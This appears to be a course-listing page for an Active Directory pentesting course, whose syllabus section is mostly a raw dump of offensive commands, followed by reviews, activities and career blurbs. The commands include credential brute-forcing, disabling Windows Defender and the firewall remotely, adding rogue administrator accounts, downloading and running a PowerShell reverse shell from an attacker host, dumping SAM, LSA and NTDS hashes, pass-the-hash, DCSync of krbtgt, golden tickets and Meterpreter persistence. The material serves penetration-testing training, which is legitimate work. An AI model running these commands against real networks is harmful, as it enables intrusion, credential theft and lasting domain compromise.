We may earn an affiliate commission when you visit our partners.
Course image
Security Gurus

Most enterprise networks today are managed using Windows Active Directory and it is imperative for a security professional to understand the threats to the Windows infrastructure.

Active Directory Pretesting is designed to provide security professionals to understand, analyze and practice threats and attacks in a modern Active Directory environment. The course is beginner friendly and comes with a walkthrough videos course and all documents with all the commands executed in the videos. The course is based on our years of experience of breaking Windows and AD environments and research.

Read more

Most enterprise networks today are managed using Windows Active Directory and it is imperative for a security professional to understand the threats to the Windows infrastructure.

Active Directory Pretesting is designed to provide security professionals to understand, analyze and practice threats and attacks in a modern Active Directory environment. The course is beginner friendly and comes with a walkthrough videos course and all documents with all the commands executed in the videos. The course is based on our years of experience of breaking Windows and AD environments and research.

When it comes to AD security, there is a large gap of knowledge which security professionals and administrators struggle to fill. Over the years, I have taken numerous world trainings on AD security and always found that there is a lack of quality material and specially, a lack of good walkthrough and explanation.

The course simulate real world attack and defense scenarios and we start with a non-admin user account in the domain and we work our way up to enterprise admin. The focus is on exploiting the variety of overlooked domain features and not just software vulnerabilities.

We cover topics like AD enumeration, tools to use, domain privilege escalation, domain persistence, Kerberos based attacks (Golden ticket, Silver ticket and more), ACL issues, SQL server trusts, and bypasses of defenses.

Attacking and Hacking Active Directory With Kali Linux Full Course - Read Team Hacking Pentesting

Enroll now

What's inside

Learning objectives

  • How to use metasploit to exploit active directory
  • How to use empire to exploit active directory
  • How to use evil-winrm to exploit active directory
  • How to use crackmapexec to exploit active directory
  • How to exploit active directory from windows
  • How to do active directory enumeration
  • How to do lateral movement
  • Active directory post exploitation
  • Active directory domain privilege escalation
  • Active directory persistence attacks
  • How to use kali linux to hack active directory
  • How to use nmap to enumerate servers
  • How to exploit eternalblue
  • Show more
  • Show less

Syllabus

Introduction
Network Enumeration - Kali
NMAP
NMAP SMB
Read more

https://github.com/ropnop/windapsearch

Download it here:

https://github.com/dirkjanm/ldapdomaindump

enum4linux -u ippsec -p Password12345 -a 192.168.1.50

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.1.50 -Pn

nmap -p 88 --script=krb5-enum-users --script krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' 192.168.1.50 -Pn

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetADUsers.py

python3 GetADUsers.py -all -dc-ip 192.168.1.50 pentesting.local/ippsec

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/findDelegation.py

python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec

python3 GetUserSPNs.py -dc-ip 192.168.1.50 pentesting.local/ippsec

https://github.com/byt3bl33d3r/CrackMapExec

Bruteforcing examples

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --no-bruteforce

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

Enumerate shares and access

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --shares

Enumerate active sessions

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --sessions

Enumerate disks

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --disks

Enumerate logged on users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --loggedon-users

Enumerate domain users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --users

python3 crackmapexec.py smb 192.168.1.50 -u 'ippsec' -p 'Password12345' --users

Enumerate users by bruteforcing RID

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute

Enumerate domain groups

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups

Enumerate local groups

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups

Obtain domain password policy

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'ipconfig'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Invoke-WebRequest -Uri "http://192.168.1.223:8000/users.txt" -OutFile "c:\Users\ippsec\Desktop\user.txt"'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir c:\Users\ippsec\Desktop'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type c:\Users\ippsec\Desktop\user.txt'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345  -x 'net user /add admin Password12345'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345  -x 'net user'

#Add to Administrator Group

crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345  -x 'net localgroup administrators admin /add'

crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345  -x 'net localgroup administrators'

crackmapexec 192.168.215.138 -u admin -p Password12345  --local-auth

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1

mv Invoke-PowerShellTcpOneLine.ps1 invoke.ps1

nc -lvp 1234

crackmapexec wirm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'

SAM is short for the Security Account Manager which manages all the user accounts and their passwords. It acts as a database. All the passwords are hashed and then stored SAM. It is the responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the database maintained in SAM. SAM starts running in the background as soon as the Windows boots up. SAM is found in C:\Windows\System32\config and passwords that are hashed and saved in SAM can found in the registry, just open the Registry Editor and navigate yourself to HKEY_LOCAL_MACHINE\SAM.

crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --sam

ls ~/.cme/logs/

ls ~/.cme/logs/

sudo crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --lsa

#Where the dumps are stored

ls ~/.cme/logs/

cracking with John

john --format=NT hash

john --format=NT hash --show

john --format=NT  --wordlist=/home/user/Desktop/rockyou.txt hash

crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'

#against the domain controller, too

crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'

#Dump the entire NTLM --ntds database

sudo crackmapexec smb 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da --ntds

pth-winexe -U pentesting/

pth-winexe

apt-get update

apt-get install freerdp-x11

xfreerdp /u:ippsec /d:win2012 /pth: /v:192.168.1.54

crackmapexec smb -L

crackmapexec smb -M mimikatz --options

sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345

sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345 --server-port 81

saved here

ls /root/.cme/logs/

#start the database

cmedb

help

proto smb

help

creds

sudo crackmapexec smb 192.168.1.50 -id 2

sudo crackmapexec smb 192.168.1.50 -id 3

Install Java:

echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list

sudo apt-get update

Install Neo4j

  1. Add the neo4j repo to your apt sources:

wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -

echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list

sudo apt-get update

  1. Install apt-transport-https with apt

apt-get install apt-transport-https

  3. Install neo4j community edition using apt:

sudo apt-get install neo4j

systemctl stop neo4j

cd /usr/bin

./neo4j console or systemctl start neo4j

You should see the neo4j web console.

  1. Authenticate to neo4j in the web console with username neo4j, password neo4j.

  2. You’ll be prompted to change this password.

Download the BloodHound GUI

  1. Download the latest version of the BloodHound GUI from

  2. https://github.com/BloodHoundAD/BloodHound/releases

  3. Unzip the folder, then run BloodHound with the –no-sandbox flag:

./BloodHound.bin --no-sandbox

https://bloodhound.readthedocs.io/en/latest/installation/linux.html

sudo msfconsole

use exploit/multi/handler

set LHOST 192.168.1.223 <-- local Machine

set LPORT 470

python3 -m http.server

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'

AMSI

AntiMalware Scan Interface

Windows AMSI is integrated into the following components:

    PowerShell (scripts, interactive use, and dynamic code evaluation)

    PowerShell ISE (Windows PowerShell-IDE)

    Windows Script Host (Wscript.exe and Cscript.exe) (scripts and dynamic code evaluation)

    User Account Control (UAC) (using a different type of AMSI-provider)

    Office365 (JavaScript/VBA)

    Office365 (Documents)

    .Net Framework 4.8 (Scanning for all assemblies)

    Windows Management Instrumentation (WMI)

upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.

  • usage: upload local_path remote_path

download: it is not needed to set local_path if the remote file is in the current directory.

  • usage: download remote_path local_path

services: list all services. No administrator permissions needed.

iex(new-object net.webclient).downloadstring(http://192.168.1.223:8000/PowerView.ps1')

Dll-Loader -http -path http://192.168.1.223:8000/SharpSploit.dll

menu

[SharpSploit.

[SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()

[SharpSploit.Enumeration.Net]::GetNetLocalGroups()

[SharpSploit.Enumeration.Net]::GetNetLoggedOnUsers()

[SharpSploit.Enumeration.Net]::GetNetSessions()

[SharpSploit.Enumeration.Net]::GetNetShares()

User Enumeration

Get current username

echo %USERNAME% || whoami

$env:username

List user privilege

whoami /priv

whoami /groups

List all users

net user

whoami /all

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\Users -Force | select Name

List logon requirements; useable for bruteforcing

net accounts

Get details about a user (i.e. administrator, admin, current user)

net user administrator

net user admin

net user %USERNAME%

List all local groups

net localgroup

Get-LocalGroup | ft Name

Get details about a group (i.e. administrators)

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

Network Enumeration

List all network interfaces, IP, and DNS.

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List the ARP table

arp -A

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

List all current connections

netstat -ano

List firewall state and current configuration

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

List firewall's blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

List all network shares

net share

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://github.com/rasta-mouse/Sherlock

https://github.com/rasta-mouse/Watson

https://github.com/BC-SECURITY/Empire

sudo apt install powershell-empire

sudo powershell-empire

https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/

Listeners

help

uselistener http

info <-  it will display all the options that you can tweak

BindIP to Kali’s IP address

Port to any port number other than 80

execute

https://www.youtube.com/watch?v=52xkWbDMUUM&ab_channel=HackerSploit

net user raba Password123 /add

net localgroup administrators raba /add

net localgroup "Remote Management Users" raba /add

remove old

evil-winrm -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -i 192.168.1.50

upload /tmp/launcher.bat C:\Users\jenkinsadmin\Documents\launcher.bat

C:\Users\jenkinsadmin\Documents\launcher.bat

Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.

Check if it is exploitable:

use exploit/windows/smb/ms17_010_psexec

set rhosts 192.168.1.53

set smbpass Password123

set smbuser student1

set smbdomain pentesting.local

set paylod windows/meterpreter/reverse_tcp

run

/

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

use Auxiliary/gather/Kerberos_enumusers

sysinfo

ps

post/windows/gather/enum_ad_users

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_logged_on_users

post/windows/gather/enum_ad_user_comments

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_domain

post/windows/gather/enum_computers

post/windows/gather/resolve_sid.rb

run post/windows/gather/enum_ad_computers.rb

post/windows/gather/local_admin_search_enum

post/windows/gather/enum_ad_service_principal_names

run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

ipconfig

netstat

route

#Windows Gather Enumerate Domain Admin Tokens (T

post/windows/gather/enum_tokens

post/windows/gather/enum_patches

post/windows/gather/credentials/winscp

#Windows Gather Powershell Environment Setting E

post/windows/gather/enum_powershell_env

post/windows/gather/enum_ie

post/windows/gather/bloodhound

for More

search post/windows/gather/

use post/windows/gather/enum_shares

use post/windows/gather/enum_services

use post/windows/gather/enum_snmp

use post/windows/gather/enum_chrome

use post/windows/gather/enum_av_excluded

use post/windows/gather/enum_putty_saved_sessions

use post/windows/gather/enum_applications

use post/windows/gather/win_privs

use post/windows/gather/forensics/browser_history

for more:

search post/windows/gather/

LOCAL_EXPLOIT_SUGGESTER

run post/multi/recon/local_exploit_suggester

post/windows/gather/win_privs

post/windows/manage/add_user

set addtogroup true

set username test

set group administrators

set session 2

post/windows/manage/delete_user

search hashdump

search credential_collector

post/windows/gather/hashdump

post/windows/gather/credentials/credential_collector

meterpreter > load kiwi

meterpreter > help

Testing Credentials

crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!

https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

  • use exploit/windows/smb/psexec

    • set SMBDomain pentesting.local

    • set smbuser ippsec

    • set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe

    • set rhosts 192.168.1.55

    • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

  • use exploit/windows/smb/psexec

    • set SMBDomain pentesting.local

    • set smbuser s4vitar

    • set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71

    • set rhosts 192.168.1.50

    • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

use post/windows/gather/credentials/domain_hashdump

scanner/smb/impacket/secretsdump

In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator for example we can perform higher privilege operations on the target.

use post/windows/gather/credentials/domain_hashdump

use incognito

list_tokens -u

impersonate_token PENTESTING\\Administrator

From Domain Controller

meterpreter > use incognito

meterpreter > impersonate_token PENTESTING\\Administrator

meterpreter > load kiwi

meterpreter > help

meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'

meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'

use post/windows/escalate/golden_ticket

Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.

The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.

With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).

Because the attacker is controlling the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), then he has the golden ticket to access any resource on the domain.

kerberos_ticket_list

kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin

After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.

meterpreter > run persistence -h

meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223

meterpreter > exit

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.223

set LPORT 4458

exploit

When a user logs in to the remote system, a Meterpreter session is opened up for us.

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.

In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.

One primary difference between pass-the-hash and pass-the-ticket, is that Kerberos TGT tickets expire (10 hours by default) whereas NTLM hashes only change when the user changes their password. So a TGT ticket must be used within its lifetime, or it can be renewed for a longer period of time (7 days).   

Traffic lights

Read about what's good
what should give you pause
and possible dealbreakers
Provides hands-on experience with tools like Metasploit, Empire, and CrackMapExec, which are essential for real-world penetration testing scenarios
Simulates real-world attack scenarios, starting with a non-admin user and escalating to enterprise admin privileges, mirroring common red teaming exercises
Covers Kerberos-based attacks like Golden Ticket and Silver Ticket, which are critical for understanding and mitigating advanced persistent threats
Includes walkthrough videos and command documentation, which can help beginners grasp complex concepts and techniques in Active Directory pentesting
Explores often-overlooked domain features and ACL issues, which are crucial for identifying vulnerabilities during security audits and assessments
Focuses on exploiting domain features rather than just software vulnerabilities, which reflects a more realistic and comprehensive approach to AD security

Save this course

Create your own learning path. Save this course to your list so you can find it easily later.
Save

Reviews summary

Active directory pentesting: practical tools & techniques

According to learners, this course provides a strong foundation in Active Directory penetration testing, heavily focusing on practical tools like Metasploit, Empire, Evil-WinRM, and CrackMapExec. Students particularly appreciate the hands-on approach and real-world scenarios, starting from an unprivileged user and escalating to enterprise admin. Many found the walkthrough videos clear and helpful, covering various attack techniques like Kerberos attacks, ACL issues, and persistence. While some reviews mention that the environment setup can be tricky or specific tool versions may vary, the overall feedback is very positive, highlighting the course's value for those looking to learn practical red team skills.
Some tool versions might differ from videos.
"Occasionally, tool outputs or commands varied slightly due to version differences."
"Following along required minor adjustments because the tool versions in the course were older."
"While the concepts are sound, some specific commands needed tweaking for current tool versions."
"I noticed a few discrepancies when using the latest versions of Kali tools."
Concepts explained clearly and concisely.
"...a lack of quality material and specially, a lack of good walkthrough and explanation. This course addresses that gap well."
"The walkthrough videos were clear and easy to follow."
"Concepts explained are very easy to understand and follow."
"I found the explanations of techniques very clear and insightful."
Covers various AD attack techniques.
"The course covers a wide range of Active Directory attack techniques, including Kerberos and persistence."
"Excellent content, going from basic enumeration to advanced attacks like Golden Ticket."
"Covers topics like AD enumeration, tools to use, domain privilege escalation, domain persistence, Kerberos based attacks (Golden ticket, Silver ticket and more)..."
"I learned many different ways to escalate privileges and maintain persistence in an AD environment."
Hands-on practice with realistic scenarios.
"The hands-on labs are the highlight, allowing me to practice techniques."
"I enjoyed the practical exercises and real-world examples provided in the course."
"Very practical course... focusing on exploiting the variety of overlooked domain features."
"The focus is on exploiting the variety of overlooked domain features and not just software vulnerabilities. Very cool."
Practical use of key pentesting tools.
"This course is very helpful, learn many tools in Kali linux to penetrate AD"
"Great course with practical tools and techniques using Metasploit, Empire, Evil-WinRM, CrackMapExec and other."
"Excellent course on how to use tools like Metasploit, Crackmapexec etc. to test the security of Active Directory."
"Very practical course about Active Directory Pentesting covering a lot of different tools and concepts."
Setting up the lab environment can be difficult.
"The lab environment setup was a bit challenging for me to get right initially."
"I struggled a bit with setting up the required virtual machines and network configuration."
"Some parts of the lab setup felt a little unclear, requiring extra troubleshooting."
"Getting the AD environment configured correctly took more time than expected."

Activities

Be better prepared before your course. Deepen your understanding during and after it. Supplement your coursework and achieve mastery of the topics covered in Active Directory Pentesting With Kali Linux - Red Team with these activities:
Review Windows Fundamentals
Solidify your understanding of Windows fundamentals to better grasp Active Directory concepts.
Show steps
  • Review Windows architecture and key components.
  • Familiarize yourself with the command line interface.
  • Understand user account management and permissions.
Review 'Active Directory'
Gain a deeper understanding of Active Directory concepts and best practices.
Show steps
  • Read the chapters on Active Directory architecture and design.
  • Study the sections on user and group management.
  • Review the chapters on security and auditing.
Practice AD Enumeration with CrackMapExec
Reinforce your enumeration skills using CrackMapExec against a lab environment.
Show steps
  • Set up a vulnerable Active Directory lab environment.
  • Use CrackMapExec to enumerate users, groups, and shares.
  • Analyze the results and identify potential attack vectors.
Four other activities
Expand to see all activities and additional details
Show all seven activities
Write a blog post on Kerberos attacks
Solidify your understanding of Kerberos attacks by explaining the concepts in a blog post.
Show steps
  • Research different Kerberos attack techniques.
  • Write a clear and concise explanation of each attack.
  • Include examples and practical demonstrations.
  • Publish the blog post on a platform like Medium or your own website.
Build an AD Pentesting Lab
Create a hands-on lab environment to practice and refine your Active Directory pentesting skills.
Show steps
  • Design the lab network topology.
  • Install and configure Active Directory domain controllers.
  • Populate the domain with users, groups, and computers.
  • Implement security controls and misconfigurations.
  • Document the lab setup and attack scenarios.
Review 'Penetration Testing Active Directory'
Learn advanced penetration testing techniques specific to Active Directory.
View Melania on Amazon
Show steps
  • Read the chapters on advanced exploitation techniques.
  • Study the sections on bypassing security controls.
  • Review the chapters on maintaining persistence.
Create a Pentesting Report Template
Develop a professional pentesting report template to document your findings and recommendations.
Show steps
  • Research industry-standard pentesting report formats.
  • Design a template that includes sections for executive summary, findings, recommendations, and technical details.
  • Populate the template with sample data and examples.
  • Refine the template based on feedback from peers and mentors.

Career center

Learners who complete Active Directory Pentesting With Kali Linux - Red Team will develop knowledge and skills that may be useful to these careers:
Penetration Tester
The role of a Penetration Tester revolves around identifying vulnerabilities and weaknesses in systems and networks using the same tools and techniques as malicious actors. This course on Active Directory Pentesting with Kali Linux helps build a foundation for a Penetration Tester. The course simulates real-world attack and defense scenarios within Active Directory environments, which is beneficial. Penetration testers use tools for AD enumeration, privilege escalation, and Kerberos-based attacks. This course may be useful for understanding and practicing these attack vectors. The walkthrough videos and documents with commands executed is useful for a penetration tester who seeks to improve their skills.
Red Team Operator
A Red Team Operator specializes in simulating advanced cyberattacks to test an organization's security posture. The Active Directory Pentesting course with Kali Linux is directly relevant to the work done by a Red Team Operator. Red teamers focus on exploiting overlooked domain features, not just software vulnerabilities. The course covers AD enumeration, tools to use, domain privilege escalation, domain persistence, Kerberos based attacks, ACL issues, and SQL server trusts. A red team operator can use this course to bypass defenses and is therefore beneficial. By simulating real-world attack scenarios, the course prepares Red Team Operators to think like attackers.
Security Consultant
Security Consultants assess and improve an organization's security infrastructure. They may focus on specific areas like Active Directory security. This course on Active Directory Pentesting with Kali Linux could be helpful for a Security Consultant. The course provides a deep understanding of threats and attacks in a modern Active Directory environment. Security consultants can learn many things from this course such as AD enumeration, domain privilege escalation, and Kerberos-based attacks. By understanding these concepts, a Security Consultant can offer better advice for the kinds of challenges that their clients face.
Information Security Analyst
Information Security Analysts protect an organization's computer systems and networks from cyber threats. This Active Directory Pentesting course with Kali Linux may be useful for an Information Security Analyst. The course is beginner friendly and comes with walkthrough videos and all documents with all the commands executed in the videos. Information security analysts can use this to prevent attacks such as those related to Active Directory enumeration, domain privilege escalation, or Kerberos. An information security analyst should take this course to improve their understanding of threats to Windows infrastructures.
Cybersecurity Engineer
Cybersecurity Engineers design, implement, and manage security systems. The Active Directory Pentesting course with Kali Linux may be helpful for a Cybersecurity Engineer. It provides practical experience in identifying and mitigating vulnerabilities in Active Directory environments. Cybersecurity engineers might find the course to be directly applicable. The course simulates real world attack and defense scenarios and covers topics like AD enumeration, tools to use, domain privilege escalation, domain persistence, and bypasses of defenses. Cybersecurity engineers can use this course to improve the security of their systems.
IT Auditor
IT Auditors evaluate an organization's IT infrastructure and processes to ensure they are secure and compliant. The Active Directory Pentesting course with Kali Linux may be useful for an IT Auditor. The course covers threats and attacks in a modern Active Directory environment. IT Auditors can use this course to better understand potential vulnerabilities and risks. The course covers topics like AD enumeration, domain privilege escalation, and Kerberos-based attacks. An IT auditor can use this course to perform a more comprehensive risk assessment of Active Directory environments.
Systems Administrator
Systems Administrators are responsible for maintaining and managing computer systems and servers, including Active Directory. While this Active Directory Pentesting course with Kali Linux may be useful for a Systems Administrator, it is useful in particular for those who wish to improve their defensive skills. By understanding attack techniques, systems administrators can better secure their Active Directory environments. The course covers AD enumeration, privilege escalation, persistence, and bypassing defenses. This is useful for a systems administrator whose tasks include securing Active Directory.
Network Engineer
Network Engineers design, implement, and manage network infrastructure. The Active Directory Pentesting course with Kali Linux may be useful for a Network Engineer, especially those who wish to understand Active Directory security. The course provides insights into how attackers can exploit network vulnerabilities within Active Directory environments. The material on network enumeration, NMAP, and SMB tools may be useful. By understanding these attack vectors, a Network Engineer can design more secure network configurations.
Cloud Security Architect
Cloud Security Architects design and implement security strategies for cloud-based systems and data. Many organizations use Active Directory in conjunction with their cloud environments. The Active Directory Pentesting course with Kali Linux may be useful for a Cloud Security Architect. The course offers a foundational understanding of Active Directory vulnerabilities that can extend to cloud environments. The walkthrough videos and documents with commands executed may be particularly useful to cloud security architects.
DevSecOps Engineer
DevSecOps Engineers integrate security practices into the software development lifecycle. The Active Directory Pentesting course with Kali Linux may be useful for a DevSecOps Engineer. The course covers threats and attacks in Active Directory environments. DevSecOps engineers can use this knowledge to automate security testing and vulnerability assessments. The course covers topics like AD enumeration, domain privilege escalation, and Kerberos-based attacks. A DevSecOps engineer can use this to integrate security into the development pipeline.
Security Operations Center Analyst
Security Operations Center Analysts monitor and respond to security incidents. The Active Directory Pentesting course with Kali Linux may be useful for a Security Operations Center Analyst. The course provides insights into attack techniques used against Active Directory environments. SOC analysts can use this knowledge to better detect and respond to Active Directory-related security incidents. This could be particularly helpful in understanding Active Directory enumeration, domain privilege escalation, and Kerberos-based attacks.
Digital Forensics Analyst
Digital Forensics Analysts investigate cybercrimes and security incidents. The Active Directory Pentesting course with Kali Linux may be useful for a Digital Forensics Analyst. The course provides an understanding of attack methods. This is valuable for identifying the source and scope of security breaches involving Active Directory. It also aids in collecting and analyzing digital evidence. The course's coverage of post-exploitation techniques can also be useful in understanding an attacker's actions.
Application Security Engineer
Application Security Engineers focus on securing applications and software. The Active Directory Pentesting course with Kali Linux may be useful for Application Security Engineers. Many applications rely on Active Directory for authentication and authorization. The course can help engineers understand how vulnerabilities in Active Directory can be exploited through applications. The course simulates real world attack and defense scenarios. Therefore, application security engineers can learn ways to bypass defenses.
Security Awareness Trainer
Security Awareness Trainers educate employees about security best practices and potential threats. The Active Directory Pentesting course with Kali Linux may be useful for a Security Awareness Trainer. The course can provide trainers with knowledge about the kinds of threats that Active Directory infrastructures face. This is useful for communicating risks to employees. Security awareness trainers who take this course can explain enumeration, privilege escalation, persistence, and bypassing defenses.
Technical Recruiter
Technical Recruiters specialize in finding and recruiting IT professionals. The Active Directory Pentesting course with Kali Linux may be useful for a Technical Recruiter as it will help them understand the Active Directory pentesting domain. The recruiter would better understand the kinds of skills and knowledge, such as AD enumeration techniques, that employers are looking for. They could better assess candidates and match them with relevant job opportunities. This improves the recruiter's ability to communicate with hiring managers and candidates.

Reading list

We've selected two books that we think will supplement your learning. Use these to develop background knowledge, enrich your coursework, and gain a deeper understanding of the topics covered in Active Directory Pentesting With Kali Linux - Red Team.
Provides a comprehensive overview of Active Directory, covering its architecture, design, and management. It valuable resource for understanding the underlying concepts and best practices. This book is helpful in providing background knowledge and useful reference tool. It is commonly used as a textbook at academic institutions and by industry professionals.

Share

Help others find this course page by sharing it with your friends and followers:

Similar courses

Similar courses are unavailable at this time. Please try again later.
Our mission

OpenCourser helps millions of learners each year. People visit us to learn workspace skills, ace their exams, and nurture their curiosity.

Our extensive catalog contains over 50,000 courses and twice as many books. Browse by search, by topic, or even by career interests. We'll match you to the right resources quickly.

Find this site helpful? Tell a friend about us.

Affiliate disclosure

We're supported by our community of learners. When you purchase or subscribe to courses and programs or purchase books, we may earn a commission from our partners.

Your purchases help us maintain our catalog and keep our servers humming without ads.

Thank you for supporting OpenCourser.

© 2016 - 2025 OpenCourser